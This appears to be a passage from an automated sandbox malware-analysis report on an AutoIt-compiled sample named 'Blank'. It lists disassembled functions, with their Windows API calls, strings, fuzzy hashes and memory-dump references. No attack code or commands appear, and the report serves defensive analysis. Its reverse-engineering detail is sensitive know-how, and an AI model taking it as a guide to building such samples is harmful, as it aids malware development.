                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 464785882-4108050209
                                                                                                                                    • Opcode ID: 0cf7c6b756a2c8b4467ed99dd9f45342590d6a3e4f48e895ef824dec8700a7a5
                                                                                                                                    • Instruction ID: dbb439add0dc5eee38e03a388e204f541e59cf792e1518384f5029d5ac5628b0
                                                                                                                                    • Opcode Fuzzy Hash: 0cf7c6b756a2c8b4467ed99dd9f45342590d6a3e4f48e895ef824dec8700a7a5
                                                                                                                                    • Instruction Fuzzy Hash: 4812AF30624202EFDB25CF24C898BA9B7A5BF04310F644569E599CB262C771EDA5CF91
                                                                                                                                    Function 002727FC Relevance: 47.5, APIs: 12, Strings: 15, Instructions: 298COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                                                                                                    • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                                                                    • API String ID: 2660009612-1645009161
                                                                                                                                    • Opcode ID: e96cd68d30fa13129dae9d3bc7d230ada05ad46a37ca5da9f152a1efb01671d0
                                                                                                                                    • Instruction ID: 3e051d9917995e32fec794069a0abbb05b1429f3ba66cf4ce196ef67452d8046
                                                                                                                                    • Opcode Fuzzy Hash: e96cd68d30fa13129dae9d3bc7d230ada05ad46a37ca5da9f152a1efb01671d0
                                                                                                                                    • Instruction Fuzzy Hash: 8BA1A530A2020AFBCB14EF61CD42EBE7775AF45740F148029F909AB292DB719E75DB61
                                                                                                                                    Function 002D7B95 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(?), ref: 002D7BC8
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002D7C87
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002D7CC5
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002D7CD7
                                                                                                                                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002D7D1D
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 002D7D29
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002D7D6D
                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002D7D7C
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002D7D8C
                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 002D7D90
                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002D7DA0
                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D7DA9
                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 002D7DB2
                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002D7DDE
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 002D7DF5
                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002D7E30
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002D7E44
                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 002D7E55
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002D7E85
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 002D7E90
                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002D7E9B
                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002D7EA5
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                    • Opcode ID: 1e7d39de1b942d571fbcd58f4d13760df26c9878ac56526baced0ca37a67d569
                                                                                                                                    • Instruction ID: 58131586c620933c3ae38cd61d4e58cdfe41b3c8cc403abace7f42ea9167d3f8
                                                                                                                                    • Opcode Fuzzy Hash: 1e7d39de1b942d571fbcd58f4d13760df26c9878ac56526baced0ca37a67d569
                                                                                                                                    • Instruction Fuzzy Hash: 9BA17071A10219BFEB14DB64DC8AFBA7B6DEB08750F104115FA15A72E1D770AD11CF60
                                                                                                                                    Function 002CB353 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 002CB361
                                                                                                                                    • GetDriveTypeW.KERNEL32(?,002F2C4C,?,\\.\,002F0980), ref: 002CB43E
                                                                                                                                    • SetErrorMode.KERNEL32(00000000,002F2C4C,?,\\.\,002F0980), ref: 002CB59C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                    • Opcode ID: 10f8c736dd60e604c9ed393a3aba434e1c6dc43d5cc1d5abb51eb719c1408eba
                                                                                                                                    • Instruction ID: c525a182e53c4aa114e625b1c8756b5af3d8f4d47aa31ee836c47da90265c754
                                                                                                                                    • Opcode Fuzzy Hash: 10f8c736dd60e604c9ed393a3aba434e1c6dc43d5cc1d5abb51eb719c1408eba
                                                                                                                                    • Instruction Fuzzy Hash: 6251C730B74209DBCB2ADB60C943FFDB7A4AF48380F64421DE406B7591D771AEA1CA51
                                                                                                                                    Function 002EA041 Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002EA0F7
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002EA1B0
                                                                                                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 002EA1CC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 2326795674-4108050209
                                                                                                                                    • Opcode ID: eb0e55b54f4872abd0dcb9d411deb136b9c8dc1bbee4feb9718ad984e0ea22a8
                                                                                                                                    • Instruction ID: 4da3e0b74568107e35931042e1a2ee64a01e1b2df1fb1047b46d23bab0629b41
                                                                                                                                    • Opcode Fuzzy Hash: eb0e55b54f4872abd0dcb9d411deb136b9c8dc1bbee4feb9718ad984e0ea22a8
                                                                                                                                    • Instruction Fuzzy Hash: 0E021630164382AFD715CF19C888BBA7BE4FF85354F84852CF995962A1C774E864CF52
                                                                                                                                    Function 002EAF18 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetSysColor.USER32(00000012), ref: 002EAF51
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002EAF55
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 002EAF6B
                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 002EAF76
                                                                                                                                    • CreateSolidBrush.GDI32(?), ref: 002EAF7B
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 002EAF93
                                                                                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002EAFA1
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 002EAFB2
                                                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 002EAFBB
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002EAFC8
                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 002EAFE7
                                                                                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002EAFFE
                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 002EB013
                                                                                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002EB05F
                                                                                                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002EB086
                                                                                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 002EB0A4
                                                                                                                                    • DrawFocusRect.USER32(?,?), ref: 002EB0AF
                                                                                                                                    • GetSysColor.USER32(00000011), ref: 002EB0BD
                                                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 002EB0C5
                                                                                                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002EB0D9
                                                                                                                                    • SelectObject.GDI32(?,002EAC1F), ref: 002EB0F0
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002EB0FB
                                                                                                                                    • SelectObject.GDI32(?,?), ref: 002EB101
                                                                                                                                    • DeleteObject.GDI32(?), ref: 002EB106
                                                                                                                                    • SetTextColor.GDI32(?,?), ref: 002EB10C
                                                                                                                                    • SetBkColor.GDI32(?,?), ref: 002EB116
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1996641542-0
                                                                                                                                    • Opcode ID: eaccfb40f819591202d6cc205849a7cd2596618796fbf91c4b9ebf0a4f45fe7a
                                                                                                                                    • Instruction ID: aa24e6f93af397fa6e79632698bd43731992232f68ef58aa9579f957e0683df6
                                                                                                                                    • Opcode Fuzzy Hash: eaccfb40f819591202d6cc205849a7cd2596618796fbf91c4b9ebf0a4f45fe7a
                                                                                                                                    • Instruction Fuzzy Hash: 86616C71910219AFDF119FA5EC88EAE7B79FF08370F104125F915AB2A2D771A950CF90
                                                                                                                                    Function 002E8FFA Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002E90EA
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002E90FB
                                                                                                                                    • CharNextW.USER32(0000014E), ref: 002E912A
                                                                                                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002E916B
                                                                                                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002E9181
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002E9192
                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002E91AF
                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002E91FB
                                                                                                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002E9211
                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 002E9242
                                                                                                                                    • _memset.LIBCMT ref: 002E9267
                                                                                                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002E92B0
                                                                                                                                    • _memset.LIBCMT ref: 002E930F
                                                                                                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002E9339
                                                                                                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 002E9391
                                                                                                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 002E943E
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002E9460
                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002E94AA
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002E94D7
                                                                                                                                    • DrawMenuBar.USER32(?), ref: 002E94E6
                                                                                                                                    • SetWindowTextW.USER32(?,0000014E), ref: 002E950E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 1073566785-4108050209
                                                                                                                                    • Opcode ID: f7392fce64e663898d3ee45d0ba802fd2d01df4eba35fed866ce1b22edcaabb0
                                                                                                                                    • Instruction ID: af7c9d9eb449789ebf3e06b9906f31ef0b6c30686b23881f2fa4e913b74b24f0
                                                                                                                                    • Opcode Fuzzy Hash: f7392fce64e663898d3ee45d0ba802fd2d01df4eba35fed866ce1b22edcaabb0
                                                                                                                                    • Instruction Fuzzy Hash: 96E1AF70950249AFDF219F96CC88EFE7BB8FF05750F808156FA18AA191D7708AA1CF50
                                                                                                                                    Function 002E4ECC Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetCursorPos.USER32(?), ref: 002E5007
                                                                                                                                    • GetDesktopWindow.USER32 ref: 002E501C
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 002E5023
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 002E5085
                                                                                                                                    • DestroyWindow.USER32(?), ref: 002E50B1
                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002E50DA
                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002E50F8
                                                                                                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002E511E
                                                                                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 002E5133
                                                                                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002E5146
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 002E5166
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002E5181
                                                                                                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002E5195
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 002E51AD
                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 002E51D3
                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 002E51ED
                                                                                                                                    • CopyRect.USER32(?,?), ref: 002E5204
                                                                                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 002E526F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                    • Opcode ID: 6df947cf10afaa1b14e5c18857dcaea1268d8316e168289676dda3ddf636a3bb
                                                                                                                                    • Instruction ID: 9da9af2e37ab16ffc438bbbd9c394d54a39ed7fe118910859c96fed950b283f4
                                                                                                                                    • Opcode Fuzzy Hash: 6df947cf10afaa1b14e5c18857dcaea1268d8316e168289676dda3ddf636a3bb
                                                                                                                                    • Instruction Fuzzy Hash: A7B1BB70624751AFDB04DF25D888B6ABBE4BF88314F408A1CF9999B291D770EC54CF92
                                                                                                                                    Function 002C498A Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002C499C
                                                                                                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002C49C2
                                                                                                                                    • _wcscpy.LIBCMT ref: 002C49F0
                                                                                                                                    • _wcscmp.LIBCMT ref: 002C49FB
                                                                                                                                    • _wcscat.LIBCMT ref: 002C4A11
                                                                                                                                    • _wcsstr.LIBCMT ref: 002C4A1C
                                                                                                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002C4A38
                                                                                                                                    • _wcscat.LIBCMT ref: 002C4A81
                                                                                                                                    • _wcscat.LIBCMT ref: 002C4A88
                                                                                                                                    • _wcsncpy.LIBCMT ref: 002C4AB3
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                    • API String ID: 699586101-1459072770
                                                                                                                                    • Opcode ID: 52a521269ec5491eee32435a24d0fd605c52081dde9b1b6879773058285714ea
                                                                                                                                    • Instruction ID: a0b7743a0e7cb340386480ca60c471f44f348db1776e0864964c669f583ebac9
                                                                                                                                    • Opcode Fuzzy Hash: 52a521269ec5491eee32435a24d0fd605c52081dde9b1b6879773058285714ea
                                                                                                                                    • Instruction Fuzzy Hash: 04413676921205BBD714FA208C46FBFB76CDF45750F00016AFA04A61D2EB74AA318BA5
                                                                                                                                    Function 00262BA9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00262C8C
                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00262C94
                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00262CBF
                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00262CC7
                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00262CEC
                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00262D09
                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00262D19
                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00262D4C
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00262D60
                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00262D7E
                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00262D9A
                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00262DA5
                                                                                                                                      • Part of subcall function 00262714: GetCursorPos.USER32(?), ref: 00262727
                                                                                                                                      • Part of subcall function 00262714: ScreenToClient.USER32(003277B0,?), ref: 00262744
                                                                                                                                      • Part of subcall function 00262714: GetAsyncKeyState.USER32(?), ref: 00262769
                                                                                                                                      • Part of subcall function 00262714: GetAsyncKeyState.USER32(?), ref: 00262777
                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,002613C7), ref: 00262DCC
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000F.00000002.3345957016.0000000000261000.00000020.00000001.01000000.00000008.sdmp, Offset: 00260000, based on PE: true
                                                                                                                                    • Associated: 0000000F.00000002.3345908033.0000000000260000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.00000000002F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346076517.0000000000316000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000320000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346181883.0000000000324000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    • Associated: 0000000F.00000002.3346248500.0000000000329000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_15_2_260000_Blank.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                    • API String ID: 1458621304-248962490
